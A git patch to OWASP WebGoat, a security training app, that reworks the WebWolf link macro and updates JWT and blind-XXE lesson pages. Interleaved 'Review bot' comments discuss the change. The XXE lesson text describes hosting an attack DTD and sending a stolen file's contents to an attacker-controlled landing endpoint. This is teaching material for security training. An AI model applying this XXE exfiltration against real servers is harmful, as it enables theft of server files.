From a1071e9c00936ff39f548ce0914a696b1cbc7287 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Fri, 23 Apr 2021 15:11:56 +0200 Subject: [PATCH] Fix return type of asciidoctor macro implementation. --- .../owasp/webgoat/asciidoc/WebWolfMacro.java | 33 +++++++++++-------- .../resources/lessonPlans/en/JWT_decode.adoc | 2 +- .../resources/lessonPlans/en/XXE_blind.adoc | 4 +-- .../lessonPlans/en/XXE_blind_assignment.adoc | 2 +- 4 files changed, 24 insertions(+), 17 deletions(-) diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java index 40b1ba555..d54a307cf 100644 --- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java +++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java @@ -2,18 +2,17 @@ package org.owasp.webgoat.asciidoc; import org.asciidoctor.ast.ContentNode; import org.asciidoctor.extension.InlineMacroProcessor; -import org.springframework.core.env.Environment; import org.springframework.web.context.request.RequestContextHolder; import org.springframework.web.context.request.ServletRequestAttributes; import javax.servlet.http.HttpServletRequest; +import java.util.HashMap; import java.util.Map; /** * Usage in asciidoc: *

* webWolfLink:here[] will display a href with here as text - * webWolfLink:landing[noLink] will display the complete url, for example: http://WW_HOST:WW_PORT/landing */ public class WebWolfMacro extends InlineMacroProcessor { @@ -26,14 +25,22 @@ public class WebWolfMacro extends InlineMacroProcessor { } @Override - public String process(ContentNode contentNode, String target, Map attributes) { - Environment env = EnvironmentExposure.getEnv(); - String hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port")); + public Object process(ContentNode contentNode, String linkText, Map attributes) { + var env = EnvironmentExposure.getEnv(); + var hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port")); + var target = (String) attributes.getOrDefault("target", "home"); + var href = hostname + "/" + target; + //are we using noLink in webWolfLink:landing[noLink]? Then display link with full href if (displayCompleteLinkNoFormatting(attributes)) { - return hostname + (hostname.endsWith("/") ? "" : "/") + target; + linkText = href; } - return "" + target + ""; + + var options = new HashMap(); + options.put("type", ":link"); + options.put("target", href); + attributes.put("window", "_blank"); + return createPhraseNode(contentNode, "anchor", linkText, attributes, options).convert(); } private boolean displayCompleteLinkNoFormatting(Map attributes) { 
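Review bot: The class Javadoc loses its `webWolfLink:landing[noLink]` line even though `process` in the next hunk still honours `noLink`, and the new `target` attribute that now decides the link path is not documented anywhere. I would keep the `noLink` line and add one modelled on the usage this patch introduces in JWT_decode.adoc, for example `* webWolfLink:JWT[target=jwt] will link to /jwt with JWT as text; target defaults to home`. The class body continues outside this hunk.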
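Review bot: In `process`, `href` is now built only from the `target` attribute with `"home"` as a silent default, so a lesson that still writes `webWolfLink:x[]` without `target=` will link to `/home` with no error. Under `noLink` the displayed text becomes `href`, which drops whatever followed the macro name (the `?text=contents_file` part in XXE_blind_assignment.adoc, if `webWolfRootLink` shares this method). Logging or failing when `target` is absent would surface stale usages. The `hostname` part of `href` comes from `determineHost`, which reads the request `Host` header in the last hunk of this file, and it reaches `createPhraseNode` unvalidated; whether the converter escapes it is not visible here, so it would be prudent to check that it is a plain `host[:port]` before building the link. `attributes.put("window", "_blank")` also mutates the map supplied by the caller, which a copy such as `var attrs = new HashMap<>(attributes);` would avoid.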
@@ -41,9 +48,9 @@ public class WebWolfMacro extends InlineMacroProcessor { } /** - * Determine the host from the hostname and ports that were used. + * Determine the host from the hostname and ports that were used. * The purpose is to make it possible to use the application behind a reverse proxy. For instance in the docker - * compose/stack version with webgoat webwolf and nginx proxy. + * compose/stack version with webgoat webwolf and nginx proxy. * You do not have to use the indicated hostname, but if you do, you should define two hosts aliases * 127.0.0.1 www.webgoat.local www.webwolf.local */ @@ -51,11 +58,11 @@ public class WebWolfMacro extends InlineMacroProcessor { HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest(); host = request.getHeader("Host"); int semicolonIndex = host.indexOf(":"); - if (semicolonIndex==-1 || host.endsWith(":80")) { - host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local"); + if (semicolonIndex == -1 || host.endsWith(":80")) { + host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local"); } else { - host = host.substring(0, semicolonIndex); - host = host.concat(":").concat(port); + host = host.substring(0, semicolonIndex); + host = host.concat(":").concat(port); } return "http://" + host + (includeWebWolfContext() ? "/WebWolf" : ""); } diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc index 423e289e3..5a111fbc4 100644 --- a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc +++ b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc 
@@ -1,6 +1,6 @@ == Decoding a JWT token -Let's try decoding a JWT token, for this you can use the webWolfLink:JWT[] functionality inside WebWolf. +Let's try decoding a JWT token, for this you can use the webWolfLink:JWT[target=jwt] functionality inside WebWolf. Given the following token: [source] diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc index 3915b08bc..b2952ce64 100644 --- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc +++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc @@ -13,7 +13,7 @@ We can again use WebWolf to host a file called `attack.dtd`, create this file wi [source, subs="macros, specialcharacters"] ---- - + ---- Now submit the form change the xml using to: @@ -22,7 +22,7 @@ Now submit the form change the xml using to: ---- + %remote; ]> diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc index a6e060d9e..e7d2d112a 100644 --- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc +++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc @@ -11,6 +11,6 @@ In the previous page we showed you how you can ping a server with a XXE attack, |=== -Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]` +Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink,target=landing]` (NOTE: this endpoint is under your full control) Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson. \ No newline at end of file